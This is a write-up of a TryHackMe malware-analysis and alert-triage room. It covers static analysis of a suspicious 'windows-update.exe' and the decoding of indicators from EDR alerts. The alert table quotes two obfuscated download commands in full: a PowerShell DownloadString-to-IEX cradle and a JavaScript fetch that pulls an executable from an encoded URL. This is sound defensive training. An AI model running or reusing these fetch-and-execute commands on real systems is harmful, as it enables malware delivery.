Shadow Trace – TryHackMe Defensive Security Challenge
This is a Walkthrough for the Shadow Trace Windows Malware Analysis TryHackMe challenge room. The writeup is meant to offer short and concise solutions, and also offering an extended explanation right after the answer – if needed – for those interested in finding out more about the solution to a specific task.
Introduction
The description of the room is the following:
Analyse a suspicious file, uncover hidden clues, and trace the source of the infection.
A quite short room, Shadow Trace has two sections: File Analysis and Alert analysis. It focuses on static malware analysis, making us analyse a file to identify its behavior, data, and gather potential Indicators of Compromise, and on alerts related to a potential Living Off the Land attack, making us use our knowledge on normal behavior of trusted tools.
Do note that all URLs have been defanged.
Task 1: File Analysis
The machine in question contains several DFIR tools. For this task I decided to use PE Bear (a PE File Header analyzer) and CAPA (which needs to be added to the Windows Environment Variables to use). The file in question is called windows-update.exe
What is the architecture of the binary file windows-update.exe?
On PE Bear, we head to the “File Hdr” tab –> Machine –> Meaning. We see AMD64. The answer is:
64-bitAlternatively, using CAPA: In the “arch” value it says AMD64 as well.
What is the hash (sha-256) of the file windows-update.exe?
It can be easily found both in PE Bear and CAPA:
b2a88de3e3bcfae4a4b38fa36e884c586b5cb2c2c283e71fba59efdb9ea64bfc
Identify the URL within the file to use it as an IOC
For this, we need to check strings within the file. PE-Header has a section for this as well. Scrolling down the strings tab, we will eventually find the URL the file was downloaded from:
hxxp[://]tryhatme[.]com/update/security-update[.]exe
With the URL identified, can you spot a domain that can be used as an IOC?
Around string 121, we see that it tries to connect to a SMTP server, eventually making a connection to a specific domain, right before trying to open the \etc\hosts file. We know the hosts file maps IP addresses to hostnames, so it must be around here. The domain the file tries to connect to is:
responses.tryhatme.com
Input the decoded flag from the suspicious domain
In previous strings (specifically, string 110), we see an attempt to download from a domain with a path that appears to be encoded using base-64:
tryhatme.com/VEhNe3lvdV9nMHRfc29tZV9JT0NzX2ZyaWVuZH0=
Decoding the path from Base-64 will result in the flag.
What library related to socket communication is loaded by the binary?
This is asking us about loading a library, which means it is in the imports section of the PE Header. The malware imports several of them, so it will take some investigation. After researching online, the only one among the ones the malware uses who calls sockets is:
WS2_32.dll
Task 2: Alert Analysis
This task is not directly related to the previous one. We are provided a view of an EDR agent with two alerts. We must use our knowledge of what is expected system behavior to answer these. The alerts are the following:
| Time | Command | Severity | Rule | Host | Process |
|---|---|---|---|---|---|
| Mar 7th 2026 at 14:10 | (new-object system.net.webclient).DownloadString([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(“aHR0cHM6Ly90cnloYXRtZS5jb20vZGV2L21haW4uZXhl”))) | IEX; | Critical | Suspicious PowerShell execution | WIN-SRV-01.tryhackme.local / CORPsvc_backup | powershell.exe |
| Mar 7th 2026 at 15:10 | fetch([104,116,116,112,115,58,47,47,114,101,97,108,108,121,115,101,99,117,114,101,117,112,100,97,116,101,46,116,114,121,104,97,116,109,101,46,99,111,109,47,117,112,100,97,116,101,46,101,120,101].map(c=>String.fromCharCode©).join('')).then(r=>r.blob()).then(b=>{const u=URL.createObjectURL(b);const a=document.createElement('a');a.href=u;a.download='test.txt';document.body.appendChild(a);a.click();a.remove();URL.revokeObjectURL(u);}); | Critical | Suspicious Browser Download | WIN-SRV-01.tryhackme.local / CORPsvc_backup | chrome.exe (browser JavaScript execution) |
Can you identify the malicious URL from the trigger by the process powershell.exe?
At the beginning of the PowerShell command, we see a system called named “system.net.webclient” and then DownloadString. As the name implies, it is establishing a connection to a web client to download a file whose path is indicated inside the DownloadStrings parameter. And near the end of the command, we see the words “Convert” and “FromBase64String”. The string between these parenthesis is the URL, Base-64 encoded.
Once decoded, we get the answer:
hxxps[://]tryhatme[.]com/dev/main[.]exe
Can you identify the malicious URL from the alert triggered by chrome.exe?
For the second alert, we see the fetch JavaScript function, and later in the command we see that it is transforming the object obtained by fetch into an URL, and downloading from it.
Because that is definitely not an URL, we can assume it is encoded. Its encoding algorithm is Decimal. Once decoded, we get our answer.
hxxps[://]reallysecureupdate[.]tryhatme[.]com/update[.]exe
Note: if you do not know the encoding algorithm used, some tools like CyberChef provide a “detect encoding algorithm” functionality as well as the expected encoding/decoding ones. For CyberChef, this is called the “Magic” algorithm, which provides several guesses at what the encoding algorithm might be.
What's the name of the file saved in the alert triggered by chrome.exe?
The command has the following section: “download=test.txt”. This is the command telling the browser what to download the file as. Hence, the answer is:
test.txt
Congratulations! The room is finished.
Conclusion
While a particularly short room, it was definitely an educational one. I had never done malware analysis like this before, despite static analysis being an important part of the responsibilities of a Blue Team member. I had the chance to finally use tools like PE Header analyzers or CAPA on actually malicious files, and put my knowledge on expected system behavior (in this case, PowerShell) to the test!